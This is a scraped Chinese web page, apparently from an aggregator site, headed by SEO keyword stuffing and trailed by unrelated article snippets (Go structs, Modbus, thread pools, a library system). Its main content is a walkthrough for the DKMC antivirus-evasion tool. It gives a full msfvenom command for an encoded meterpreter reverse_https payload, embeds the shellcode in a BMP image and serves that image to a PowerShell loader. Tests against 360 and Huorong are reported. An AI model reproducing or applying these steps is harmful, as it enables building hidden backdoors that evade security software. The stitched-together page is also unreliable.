网站开发如何让图片加载的更快中国三大生产建设兵团

web/2025/10/7 0:05:41/文章来源:
网站开发如何让图片加载的更快,中国三大生产建设兵团,企业年金查询官网,江西seo网站排名优化0x01 免杀能力一览表 几点说明#xff1a; 1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。 2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…0x01 免杀能力一览表 几点说明 1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。 2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。 4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。 5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。 0x02 DKMC介绍 DKMC是Don’t Kill My Cat (DKMC)的简称谷歌翻译为不要杀害我的小猫咪这个名字也是挺少女心的…DKMC是一种生成混淆的shellcode的工具并把shellcode合成到图像文件中最终依靠PowerShell执行最终的shellcode有效负载。 0x03 安装DKMC 安装比较简单 $ git clone https://github.com/Mr-Un1k0d3r/DKMC $ cd DKMC $ mkdir output执行python dkmc.py即可 0x04 DKMC使用说明 执行python dkmc.py后可以看到5个选项 [*] (gen) Generate a malicious BMP image [*] (web) Start a web server and deliver malicious image [*] (ps) Generate Powershell payload [*] (sc) Generate shellcode from raw file [*] (exit) Quit the application翻译一下 [*] (gen) 将msf的shellcode注入到一个BMP图像 [*] (web) 启动web服务用来分发BMP图像 [*] (ps) 生成ps的payload [*] (sc) 将msf生成的raw文件转为shellcode [*] (exit) 退出这几个选项可不是都能生成payload而是一起组合来生成免杀的文件。 生成一个后门的流程大体为 1、先利用msf生成raw文件 2、利用sc讲raw文件转换为shellcode 3、利用gen将上一步的shellcode注入到一个BMP图像 4、利用ps生成基于powershell的BMP文件的payload 5、利用web提供的简单web服务进行分发BMP文件 4和5看起来有点乱下面我演示一下就很容易明白了。 0x05 利用DKMC生成后门 1、先利用Msf生成raw格式的shellcode稍微编码了一下 msfvenom -p windows/meterpreter/reverse_https LHOST10.211.55.2 LPORT3333 -e x86/shikata_ga_nai -b \x00 -i 5 -a x86 -f raw -o /root/test15.raw2、在主菜单中选择sc,然后设置source为/root/test15.raw,再执行run生成shellcode。 复制一下生成的shellcode,输入exit退回到主菜单。 3、在主菜单中选择gen,然后设置shellcode为上一步中生成的shellcode。 其他默认即可执行run生成图像。 看到生成了output-1577907077.bmp图像文件输入exit退回到主菜单。 4、在主菜单中选择ps,设置url地址这个url地址就是web分发图像文件的地址。 我的parrot虚拟机的地址为10.211.55.24我打算用默认的80端口这样我的url地址为http://10.211.55.24/output-1577907077.bmp 使用命令set url http://10.211.55.24/output-1577907077.bmp然后执行run生成powershell执行脚本。 复制一下生成的ps代码输入exit退回到主菜单。 5、最后一步在主菜单中选择web,使用默认80端口执行run即可。 访问虚拟机的80端口 图像可以正常打开 6、在我的测试机器上执行第4步生成的ps代码不开杀软的时候可正常上线 我将ps执行代码中的-w hidden先去掉这样可以看得直观一些 7、打开杀软进行测试 静态查杀都通过 在执行powershell代码时火绒和360卫士会拦截报警360杀毒没有反应 0x05 小结 DKMC主要把shellcode注入到bmp图像中然后使用powershell来执行其中的shellcode但是很多杀软都会监测powershell的执行动作所以virustotal.com的静态检测不足以说明什么。其实还可以进一步对ps执行代码进行混淆免杀这一点后续文章还会涉及这里就不展开说 参考 官方说明文档https://github.com/Mr-Un1k0d3r/DKMC

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/88177.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

内江市规划建设教育培训 网站小程序源码是什么

go struct 的常见问题 1. 什么是struct?2. 如何声明、定义和创建一个struct?3. struct和其他数据类型(如数组、切片、map等)有什么区别?4. 如何访问struct字段?5. struct是否支持继承,是否支持重…

凡客网站建设wordpress 5.02支持php

Modbus-ASCIl传输模式中,每个字节均以ASCI编码,实际报文中1个字节会以两ASCIl字符发送,因此这种模式比Modbus-RTU模式效率要低。 例如报文数据 x5B "5""B" X35 X42 . 数据帧格式如下: 从ASCI报文帧可以看出&#xff0…

专业的建设机械网站制作wordpress主题更新了

动态调整线程池无论您是否知道,您的Java Web应用程序很可能都使用线程池来处理传入的请求。 这是许多人忽略的实现细节,但是迟早您需要了解如何使用该池以及如何为您的应用程序正确调整池。 本文旨在说明线程模型,线程池是什么以及正确配置线…

然后建设自营网站seo软件简单易排名稳定

目录 一、Mysql对数据的增删改 1. 增加数据(INSERT语句) 2. 修改数据(UPDATE语句) ​编辑 WHERE子句(⭐): ​编辑 3. 删除数据(DELETE语句) 删除数据&#xff0…

销售网站页面特点洛阳做网站哪家好

对于长时间面对电子屏幕的上班族和学业负担重的学生族来说,他们的眼睛承受着巨大压力。加之不良的用眼习惯,导致近视人数不断增加。然而,良好的光线对眼睛健康至关重要。适宜的照明可以提供舒适的环境,减轻眼睛的负担。因此&#…

中山建设网站的公司sinaapp wordpress 固定链接

在自动化物流运输设备中,选择合适的模组类型取决于具体的运输需求和应用场景。 1、同步带模组:同步带模组是一种低噪音、低成本的物流运输设备,适用于中短距离、轻型货物的运输。它采用同步带传动的方式,具有传动准确、运行稳定、…

h5制作网站开发建筑工程摘要300字

一、文件共享 内核使用三种数据结构表示打开的文件,它们之间的关系决定了在文件共享方面一个进程对另一个进程可能产生的影响。 1、每个进程在进程表中都有一个记录项,记录项中包含有一张打开文件描述表  2、内核为所有打开文件维持一张文件表  3、每…

网站数据分析工具有哪些有源码就可以自己做H5网站吗

本指南演示了如何从 Python 应用程序中提取日志并将其安全地传送到 Elasticsearch Service 部署中。你将设置 Filebeat 来监控具有标准 Elastic Common Schema (ECS) 格式字段的 JSON 结构日志文件,然后你将在 Kibana 中查看日志事件发生的实时可视化。虽然此示例使…

怎样模仿别人的网站济南网站制作设计公司

面积图又叫区域图,是在折线图的基础之上形成的, 它将折线图中折线与自变量坐标轴之间的区域使用颜色或者纹理填充,这样一个填充区域我们叫做面积,颜色的填充也可以更好的突出趋势信息。 有数据粉好奇如何使用 Quick BI 来制作面积图&#xf…

seo短视频网页入口引流网站推荐微信小程序店铺怎么推广

有些场景,比如表单验证的时候,只要有一个字段没有填写,就给出toast提示,这就需要一发现问题,就给出提示,并且跳出循环。 map想要直接跳出循环,需要使用抛出异常的写法,而for of则适…

如何进入网站后台 被黑做网站的公司面试

实现前后端实时数据转换通常涉及到以下几个步骤: 后端提供数据转换接口。 前端实时数据获取。 前端实时数据转换。 前端实时展示转换后数据。 以下是一个简单的例子,假设后端提供了一个接口来转换某种数据格式,前端使用JavaScript和WebS…

北京高端网站建一个域名多个网站

默认情况下写在组件中的样式会 全局生效 → 因此很容易造成多个组件之间的样式冲突问题。 全局样式: 默认组件中的样式会作用到全局,任何一个组件中都会受到此样式的影响 局部样式: 可以给组件加上scoped 属性,可以让样式只作用于当前组件 一、代码示例 BaseOne…

四川省建设厅官方网站联系电话临沂企业网站

环境搭建参考&#xff1a;mongodb&#xff1a;环境搭建_Success___的博客-CSDN博客 需求&#xff1a; 在文章搜索服务中实现保存搜索记录到mongdb 并在搜索时查询出mongdb保存的数据 1、安装mongodb依赖 <dependency><groupId>org.springframework.data</groupI…

正规的企业网站建设描述网站的整体建设一般步骤

图书管理系统 项目使用jsp servletmysql实现&#xff1b; 登陆注册 首页 首页显示图书信息 图书管理 1添加书籍 2查询书籍 3预览书籍 4修改书籍 用户管理 1查询用户 2修改用户 3 删除用户 链接&#xff1a;https://pan.baidu.com/s/1QXK--ypb6OadbmKFlc0jUQ

个人网站建设的花费手机做app的软件叫什么

在上一篇内容中我们介绍了App脱壳的技术&#xff0c;今天我们来介绍一个和iOS逆向密切相关的知识&#xff1a;越狱。 iOS操作系统的封闭性一直是开发者们关注的焦点之一。为了突破Apple的限制&#xff0c;越狱技术应运而生。本文将深入探讨iOS越狱&#xff0c;包括可越狱的版本…

重庆网站建设制作设计公司哪家好惠州有家最好网站建设

P3978 [TJOI2015]概率论 设fif_ifi​表示节点数为iii的二叉树有多少&#xff0c;gig_igi​表示节点数为iii的二叉树有多少叶子节点。 fn∑i0n−1fifn−1−if_n \sum\limits_{i 0} ^{n - 1}f_if_{n - 1 - i}fn​i0∑n−1​fi​fn−1−i​&#xff0c;f01f_0 1f0​1。 对于g…

做图素材网站哪个好WordPress链接公众号插件

需要云服务器等云产品来学习Linux的同学可以移步/-->腾讯云<--/-->阿里云<--/-->华为云<--/官网&#xff0c;轻量型云服务器低至112元/年&#xff0c;新用户首次下单享超低折扣。 目录 一、Qt中的信号和槽 1、信号 2、槽 3、Q_OBJECT 二、Qt中的connect函…

主流建站开源程序有哪些精准营销的好处

出自&#xff1a;http://www.ruanyifeng.com/blog/2010/04/using_this_keyword_in_javascript.html this是Javascript语言的一个关键字。 它代表函数运行时&#xff0c;自动生成的一个内部对象&#xff0c;只能在函数内部使用。比如&#xff0c; function test(){ this.x 1; }…

购物网站设计人员推广之家邀请码

面试 Java 基础八股文十问十答第十八期 作者&#xff1a;程序员小白条&#xff0c;个人博客 相信看了本文后&#xff0c;对你的面试是有一定帮助的&#xff01;关注专栏后就能收到持续更新&#xff01; ⭐点赞⭐收藏⭐不迷路&#xff01;⭐ 1&#xff09;多线程场景下如何使用…

荆州网站建设兼职wordpress的知名网站

【BASH】回顾与知识点梳理 十五 十五. 指令与文件的搜寻15.1 脚本文件名的搜寻which (寻找『执行档』) 15.2 文件档名的搜寻whereis (由一些特定的目录中寻找文件文件名)locate / updatedbfind与时间有关的选项与使用者或组名有关的参数与文件权限及名称有关的参数额外可进行的…